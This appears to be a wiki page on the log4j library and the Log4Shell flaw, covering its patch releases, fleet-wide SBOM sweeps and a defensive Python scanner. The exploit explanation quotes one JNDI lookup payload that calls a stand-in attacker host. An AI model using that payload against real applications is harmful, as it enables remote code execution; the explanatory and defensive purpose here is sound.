
log4j

log4j is an Apache Software Foundation Java logging library — the industry-standard logging framework for JVM applications for the better part of two decades. It became famous outside the JVM community in December 2021 as the source of Log4Shell (CVE-2021-44228), a trivially-exploitable remote code execution vulnerability that affected log4j-core versions 2.0-beta9 through 2.14.1.

Log4Shell (CVE-2021-44228)

The vulnerability abused log4j's JNDI lookup feature: a log message containing ${jndi:ldap://attacker.example/a} would cause log4j to fetch and execute Java classes from the attacker's server. It was exploitable through any unvalidated string that reached a log call, including HTTP headers such as User-Agent, request paths, and form fields. The bug sat in a library linked, often transitively, by tens of thousands of Java applications worldwide.

Disclosed publicly on 2021-12-09, Log4Shell triggered one of the largest coordinated software-remediation events in industry history. It is the canonical forcing function for the fleet-wide SBOM-query vulnerability-sweep pattern: orgs that already had a fleet-wide dependency corpus could answer "which of our apps contain log4j-core 2.0-2.14?" in seconds; orgs without one scrambled through per-repo audits for days or weeks.

Canonical wiki use (Zalando 2023-04-12)

Named as the defining forcing function for Zalando's SBOM-as-data-lake platform:

"Critical vulnerabilities in commonly used libraries (e.g. log4j, spring, commons-text) require an ability to find all affected applications in minutes. Only this way can the impact of a vulnerability be assessed and mitigated quickly. … For large-scale patch actions (like the famous log4j upgrade), we prepare change sets for different types of build files and automate the Pull Request creation across all repositories." (Source: sources/2023-04-12-zalando-how-software-bill-of-materials-change-the-dependency-game)

Patched versions

  • 2.15.0 (2021-12-10) — partial fix; still exploitable via non-default configurations.
  • 2.16.0 (2021-12-13) — disabled JNDI by default, removed message lookups.
  • 2.17.0 (2021-12-18) — fixed additional DoS vector (CVE-2021-45105).
  • 2.17.1 (2021-12-28) — fixed JDBC Appender RCE (CVE-2021-44832).

The four-version patch cascade over roughly three weeks is itself a case study in the difference between an initial fix and an exhaustive one — orgs that patched once on 2021-12-10 had to re-patch three more times over the following three weeks.
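The fleet-wide SBOM query described under Log4Shell and the patch cascade listed above combine into one defender's check: given every app's component list, which apps still ship a log4j-core that some advisory in the cascade applies to? The script below is an added example written for this page, not Zalando's platform or any Apache tooling. The SBOM fragments are constructed (CycloneDX-like shape, hand-written), and the advisory table is built from the page's version list; the page states the affected lower bound (2.0-beta9) only for CVE-2021-44228, so the same lower bound is assumed for the later advisories.

```python
import re

# Constructed SBOM fragments for a fleet of four apps (CycloneDX-like shape,
# hand-written for this example; not real inventory data).
FLEET_SBOMS = {
    "checkout-service": [
        {"group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1"},
        {"group": "org.springframework", "name": "spring-core", "version": "5.3.13"},
    ],
    "search-indexer": [
        {"group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.15.0"},
    ],
    "billing-batch": [
        {"group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.17.1"},
    ],
    "static-site": [
        # log4j-api alone does not carry the lookup code; only log4j-core does.
        {"group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1"},
    ],
}

# Advisory table built from the version list on this page. Each entry is
# (label, first_affected, fixed_in): a version is affected when
# first_affected <= version < fixed_in. The page gives the lower bound only for
# CVE-2021-44228 (2.0-beta9); the same bound is ASSUMED for the later advisories.
ADVISORIES = [
    ("CVE-2021-44228 Log4Shell RCE", "2.0-beta9", "2.15.0"),
    ("2.15.0 partial fix, still exploitable in non-default configs", "2.15.0", "2.16.0"),
    ("CVE-2021-45105 DoS", "2.0-beta9", "2.17.0"),
    ("CVE-2021-44832 JDBC Appender RCE", "2.0-beta9", "2.17.1"),
]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$")
_TAG_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # GA release sorts last


def version_key(version):
    """Turn '2.0-beta9' / '2.17.1' into a tuple that sorts the way Maven orders them."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unsupported log4j version string: {version!r}")
    major, minor, patch, tag, tag_num = m.groups()
    return (int(major), int(minor), int(patch or 0), _TAG_RANK[tag], int(tag_num or 0))


def outstanding_advisories(version):
    """Return the labels of advisories that still apply to this log4j-core version."""
    key = version_key(version)
    return [label for label, lo, fixed_in in ADVISORIES
            if version_key(lo) <= key < version_key(fixed_in)]


def sweep(fleet_sboms):
    """Answer 'which apps ship an affected log4j-core?' across every SBOM.

    Returns {app: [(version, [advisory labels]), ...]} for affected apps only;
    apps that carry only log4j-api, or a fully patched log4j-core, are omitted.
    """
    findings = {}
    for app, components in fleet_sboms.items():
        for comp in components:
            if comp["group"] != "org.apache.logging.log4j" or comp["name"] != "log4j-core":
                continue
            advisories = outstanding_advisories(comp["version"])
            if advisories:
                findings.setdefault(app, []).append((comp["version"], advisories))
    return findings


if __name__ == "__main__":
    for app, hits in sweep(FLEET_SBOMS).items():
        for version, labels in hits:
            print(f"{app}: log4j-core {version} -> {', '.join(labels)}")
```

Running it flags checkout-service (2.14.1) and search-indexer (2.15.0) and clears billing-batch (2.17.1) and static-site (log4j-api only). Keeping the advisory table as data rather than a single "is it below 2.17.1?" test is the point: when the cascade grew from one version to four, a team with this shape of query only had to append a row, re-run the sweep, and reopen pull requests for the apps that reappeared.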
